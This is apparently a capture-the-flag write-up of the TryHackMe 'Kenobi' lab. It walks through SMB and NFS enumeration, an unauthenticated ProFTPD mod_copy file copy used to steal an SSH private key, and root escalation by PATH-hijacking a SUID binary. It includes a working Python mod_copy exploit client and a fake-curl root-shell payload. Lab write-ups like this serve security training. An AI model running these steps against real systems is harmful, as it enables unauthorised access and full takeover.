Kenobi
https://tryhackme.com/room/kenobi
Hello! In this writeup we go through this vulnerable, Star Wars-themed Linux machine.
Reconnaissance
First things first, let's run our nmap scan (a full-port SYN scan with service/OS detection and default scripts; -sS needs root):
> nmap -sS -p- -T4 -A 10.10.185.199
Let's look at the output of our scan:

Looking at the results we see that ports 139 and 445 are open. Every time you see these ports open, your brain should light up: SMB is a frequent source of known vulnerabilities and misconfigurations (anonymous shares, outdated server versions, weak share permissions).
In this case it's Samba that implements the SMB protocol on this host.
Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access files, printers and other commonly shared resources on a company's intranet or on the internet. It's often referred to as a network file system.
Samba is based on the common client/server protocol Server Message Block (SMB). SMB is the native file-sharing protocol on Windows; without Samba, other platforms would be isolated from Windows machines, even if they were part of the same network.
Let's go the distance. We run the Nmap Scripting Engine (NSE) share- and user-enumeration scripts (smb-enum-shares, smb-enum-users) against port 445 to enumerate SMB:

Interesting... We can access c:\home\kenobi\share as an anonymous user, with no credentials at all. Let's download the content of this share (smbclient or smbget will do):

By reading the log.txt file we discover that an SSH key pair (id_rsa / id_rsa.pub) was generated for the kenobi user. Maybe we can copy the private key into a share we have access to. But as anonymous we can only read the share, not write to it (as the log file shows), so we must find another way to move files around on the server.
We also know that port 111 is open. That is rpcbind, which NFS relies on, so there may be NFS exports. We run showmount -e against the target to list them:

Okay, we can mount this export (/var) to read the server's files over the network. We will use this in a second.
Now we need a way to get the SSH key into the /var directory. FTP is running, served by ProFTPD, and the version reported is 1.3.5. A quick search shows that this version's mod_copy module lets an unauthenticated client run the SITE CPFR (copy from) and SITE CPTO (copy to) commands and copy files around on the server without logging in (CVE-2015-3306). The copy runs with the privileges of the user ProFTPD runs as, so the source must be readable and the destination writable by that user; a world-writable directory such as /var/tmp is a safe target. Seems like we have found a way to copy the SSH key, nice!
Let's mount the /var export on our machine:

Exploitation
Now let's abuse the ProFTPD mod_copy vulnerability to copy the key somewhere under /var that the FTP user can write to (e.g. /var/tmp), so it shows up in our NFS mount:

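The control-channel exchange behind this step, as an added example that is not part of the original writeup and not the room's own tooling: a small Python client that opens the FTP control connection and sends SITE CPFR / SITE CPTO without ever authenticating, talking to a constructed stub that mimics how a ProFTPD 1.3.5 mod_copy server replies (and, with gated=True, how a fixed server answers with 530). The destination path /var/tmp/id_rsa, the stub's banner text and the placeholder key contents are assumptions made for the example; the writeup only says the key ends up under /var.

```python
"""ProFTPD 1.3.5 mod_copy abuse: SITE CPFR / SITE CPTO with no login.

Added example, not code from the original writeup. `mod_copy_exploit` is the
client you would point at the real server. `stub_proftpd` is a constructed
stand-in so this runs offline: it answers with the reply lines real mod_copy
uses, keeps an in-memory dict as its "filesystem", and, like the vulnerable
version, accepts SITE CPFR/CPTO before any USER/PASS. With gated=True it acts
like a fixed server (530 until logged in) so the client's failure path is
exercised too. The key in SAMPLE_FILES is a placeholder, not a real key.
"""
import socket
import threading

SRC_PATH = "/home/kenobi/.ssh/id_rsa"
DST_PATH = "/var/tmp/id_rsa"   # assumed: under the NFS-exported /var, writable by the FTP user

# Constructed sample "filesystem" for the stub server; not a real key.
SAMPLE_FILES = {SRC_PATH: b"-----BEGIN RSA PRIVATE KEY-----\nplaceholder\n-----END RSA PRIVATE KEY-----\n"}


def mod_copy_exploit(host, port, src, dst, timeout=5.0):
    """Copy `src` to `dst` on the server over a raw control connection.

    Returns the transcript as (sent, received) pairs. Raises RuntimeError on the
    first reply that is not the expected success code, so a patched server
    (530/500) is not mistaken for a successful copy.
    """
    transcript = []
    with socket.create_connection((host, port), timeout=timeout) as sock, \
            sock.makefile("rwb") as f:
        transcript.append(("", f.readline().decode().rstrip("\r\n")))  # 220 banner
        for cmd, want in ((f"SITE CPFR {src}", "350"), (f"SITE CPTO {dst}", "250")):
            f.write(cmd.encode() + b"\r\n")
            f.flush()
            reply = f.readline().decode().rstrip("\r\n")
            transcript.append((cmd, reply))
            if not reply.startswith(want):
                raise RuntimeError(f"{cmd!r} rejected: {reply}")
        f.write(b"QUIT\r\n")
        f.flush()
    return transcript


def stub_proftpd(listener, files, gated=False):
    """One-shot ProFTPD stand-in. gated=False reproduces the mod_copy bug."""
    conn, _ = listener.accept()
    with conn, conn.makefile("rwb") as f:
        f.write(b"220 ProFTPD 1.3.5 Server (stub) [127.0.0.1]\r\n")
        f.flush()
        pending_src = None
        while True:
            line = f.readline()
            if not line:
                break
            cmd = line.decode(errors="replace").rstrip("\r\n")
            verb = cmd.upper()
            if verb == "QUIT":
                f.write(b"221 Goodbye.\r\n")
                f.flush()
                break
            if verb.startswith("SITE ") and gated:
                reply = b"530 Please login with USER and PASS\r\n"   # fixed behaviour
            elif verb.startswith("SITE CPFR "):       # the bug: no auth check here
                pending_src = cmd[len("SITE CPFR "):]
                reply = (b"350 File or directory exists, ready for destination name\r\n"
                         if pending_src in files else b"550 No such file or directory\r\n")
            elif verb.startswith("SITE CPTO ") and pending_src in files:
                files[cmd[len("SITE CPTO "):]] = files[pending_src]   # the copy itself
                reply = b"250 Copy successful\r\n"
            else:
                reply = b"500 Command not understood\r\n"
            f.write(reply)
            f.flush()


def run_demo(gated=False):
    """Start the stub on a loopback port, run the client, return (ok, transcript, files)."""
    files = dict(SAMPLE_FILES)
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    server = threading.Thread(target=stub_proftpd, args=(listener, files, gated), daemon=True)
    server.start()
    ok, transcript = True, []
    try:
        transcript = mod_copy_exploit("127.0.0.1", listener.getsockname()[1], SRC_PATH, DST_PATH)
    except RuntimeError:
        ok = False
    finally:
        server.join(timeout=5)
        listener.close()
    return ok, transcript, files


if __name__ == "__main__":
    ok, transcript, files = run_demo()
    for sent, received in transcript:
        print(f"{'> ' + sent if sent else '<'} {received}")
    print("copied:", ok and files.get(DST_PATH) == files[SRC_PATH])
```

Against the real box you would call mod_copy_exploit with the target's IP and port 21; the point of checking the reply codes is that a patched ProFTPD answers 530 to SITE commands before login, and you want the client to stop there rather than assume the copy happened and go looking for a key that never arrived.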
We expect to find the id_rsa file in our NFS mount. Let's check:

BOOM! Now we can use this key to log in over SSH as kenobi without knowing the password (copy it locally and chmod 600 it first, otherwise ssh refuses to use a world-readable key):

Privilege Escalation
So now we are logged in as kenobi. Let's look for SUID binaries (files that run with their owner's privileges) with the following command:
> find / -perm -u=s -type f 2>/dev/null

Most of the hits are standard system binaries, but /usr/bin/menu is not, so let's run strings on it to see what it does:

Now we know that this binary, which is owned by root and has the SUID bit set, runs the curl command as root. curl is invoked without an absolute path, so the binary searches the directories in its PATH environment variable, in order, for something called curl. NICE! We can create a malicious file called "curl", put its directory at the front of PATH, and /usr/bin/menu will execute it instead of the real one.
Let's create the curl file, which will spawn a shell (if the payload uses bash, start it with -p, otherwise bash drops the root effective uid back to kenobi's):

We prepend (not append) /home/kenobi to PATH, so that our curl is found before /usr/bin/curl:

Perfect! Now we expect that when we run /usr/bin/menu, the malicious curl will be executed as root and a root shell will pop. Let's see:

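The PATH hijack replayed offline, as an added example that is not part of the original writeup and does not use the room's /usr/bin/menu binary: a fake curl is planted in a temporary directory, that directory is prepended to PATH, and a stand-in for menu (assumed here to be sh -c "curl -I localhost", mirroring how the real binary calls curl by bare name) runs the fake. The payload only reports which uid ran it instead of spawning a shell, and nothing here needs root; a small audit helper shows the check a defender would run on PATH.

```python
"""PATH hijack of a SUID wrapper that calls `curl` by bare name.

Added example, not part of the original writeup and not the room's
/usr/bin/menu binary. Assumptions: a POSIX host with `sh`; the stand-in
"menu" is just `sh -c "curl -I localhost"`, which invokes curl the same way
the real binary does (bare name, resolved through PATH). The payload prints
its effective uid instead of spawning a shell, so this runs unprivileged.
"""
import os
import shutil
import subprocess
import tempfile

# Constructed payload. In the real attack this file would be e.g.
#   #!/bin/sh
#   /bin/sh -p
# so the SUID-root caller hands you a root shell; here it only reports who ran it.
FAKE_CURL = """#!/bin/sh
echo "fake curl executed as uid $(id -u) with args: $*"
"""


def plant_fake_curl(directory):
    """Write an executable named `curl` into `directory` and return its path."""
    path = os.path.join(directory, "curl")
    with open(path, "w") as fh:
        fh.write(FAKE_CURL)
    os.chmod(path, 0o755)
    return path


def resolve_curl(path_env):
    """Which file a bare `curl` resolves to under the given PATH (first match wins)."""
    return shutil.which("curl", path=path_env)


def run_menu_like(path_env):
    """Stand-in for /usr/bin/menu: invoke curl by bare name under a chosen PATH."""
    env = dict(os.environ, PATH=path_env)
    proc = subprocess.run(["sh", "-c", "curl -I localhost"], env=env,
                          capture_output=True, text=True, timeout=10)
    return proc.stdout.strip()


def writable_path_dirs(path_env):
    """Defender's check: PATH entries an attacker could drop a binary into.

    Flags empty or relative entries (they mean the current directory) and any
    directory the current user can write to.
    """
    flagged = []
    for entry in path_env.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            flagged.append(entry)
        elif os.path.isdir(entry) and os.access(entry, os.W_OK):
            flagged.append(entry)
    return flagged


def demo():
    """Replay the writeup's privesc offline; returns (fake path, resolved path, output)."""
    workdir = tempfile.mkdtemp(prefix="kenobi-path-")
    fake = plant_fake_curl(workdir)
    hijacked = workdir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
    return fake, resolve_curl(hijacked), run_menu_like(hijacked)


if __name__ == "__main__":
    fake, resolved, output = demo()
    print("bare `curl` now resolves to:", resolved)
    print("menu stand-in printed:", output)
    print("writable PATH entries:", writable_path_dirs(os.environ.get("PATH", "")))
```

The same lookup order is why appending /home/kenobi to PATH would not work: /usr/bin/curl would still be found first. On the real box the fix is for the binary to call curl by absolute path (or to reset PATH itself), since a SUID program cannot trust any environment variable it inherits from the caller.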
Congratulations! We escalated to root thanks to PATH hijacking of a SUID binary! Now we just move to the root directory to grab the root flag.

Thanks for reading my writeup! See you!